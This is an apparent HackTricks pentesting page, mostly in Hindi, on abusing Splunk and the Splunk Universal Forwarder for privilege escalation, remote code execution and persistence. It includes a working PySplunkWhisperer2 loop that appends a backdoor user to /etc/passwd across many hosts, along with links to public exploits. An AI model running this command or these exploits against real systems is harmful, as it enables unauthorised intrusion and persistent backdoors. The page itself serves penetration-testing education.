Splunk LPE and Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

यदि आंतरिक या बाहरी रूप से किसी मशीन का गणना करते समय आपको Splunk चलाते हुए (पोर्ट 8090) मिलता है, यदि आपको किसी मान्य क्रेडेंशियल का पता है तो आप Splunk सेवा का दुरुपयोग करके एक शेल को उस उपयोगकर्ता के रूप में निष्पादित कर सकते हैं जो Splunk चला रहा है। यदि रूट इसे चला रहा है, तो आप रूट तक विशेषाधिकार बढ़ा सकते हैं।

यदि आप पहले से ही रूट हैं और Splunk सेवा केवल लोकलहोस्ट पर सुन नहीं रही है, तो आप Splunk सेवा से पासवर्ड फ़ाइल चुरा सकते हैं और पासवर्ड को क्रैक कर सकते हैं, या इसमें नए क्रेडेंशियल जोड़ सकते हैं। और होस्ट पर स्थिरता बनाए रख सकते हैं।

नीचे पहले चित्र में आप देख सकते हैं कि एक Splunkd वेब पृष्ठ कैसा दिखता है।

Splunk यूनिवर्सल फॉरवर्डर एजेंट का शोषण सारांश

अधिक विवरण के लिए पोस्ट देखें https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/। यह केवल एक सारांश है:

शोषण अवलोकन: Splunk यूनिवर्सल फॉरवर्डर एजेंट (UF) को लक्षित करने वाला एक शोषण उन हमलावरों को अनुमति देता है जिनके पास एजेंट पासवर्ड है, एजेंट चला रहे सिस्टम पर मनमाना कोड निष्पादित करने के लिए, संभावित रूप से पूरे नेटवर्क को खतरे में डालता है।

मुख्य बिंदु:

UF एजेंट आने वाले कनेक्शनों या कोड की प्रामाणिकता को मान्य नहीं करता है, जिससे यह अनधिकृत कोड निष्पादन के लिए संवेदनशील हो जाता है।
सामान्य पासवर्ड अधिग्रहण विधियों में उन्हें नेटवर्क निर्देशिकाओं, फ़ाइल शेयरों, या आंतरिक दस्तावेज़ों में ढूंढना शामिल है।
सफल शोषण से समझौता किए गए होस्ट पर SYSTEM या रूट स्तर की पहुंच, डेटा निकासी, और आगे के नेटवर्क में घुसपैठ हो सकती है।

शोषण निष्पादन:

हमलावर UF एजेंट पासवर्ड प्राप्त करता है।
एजेंटों को आदेश या स्क्रिप्ट भेजने के लिए Splunk API का उपयोग करता है।
संभावित क्रियाओं में फ़ाइल निष्कर्षण, उपयोगकर्ता खाता हेरफेर, और सिस्टम का समझौता शामिल है।

प्रभाव:

प्रत्येक होस्ट पर SYSTEM/रूट स्तर की अनुमतियों के साथ पूर्ण नेटवर्क समझौता।
पहचान से बचने के लिए लॉगिंग को अक्षम करने की संभावना।
बैकडोर या रैनसमवेयर की स्थापना।

शोषण के लिए उदाहरण आदेश:

for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done

उपयोगी सार्वजनिक एक्सप्लॉइट्स:

https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
https://www.exploit-db.com/exploits/46238
https://www.exploit-db.com/exploits/46487

Splunk क्वेरी का दुरुपयोग

अधिक जानकारी के लिए पोस्ट देखें https://blog.hrncirik.net/cve-2023-46214-analysis

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousSocket Command Injection NextSSH Forward Agent exploitation

Last updated 1 month ago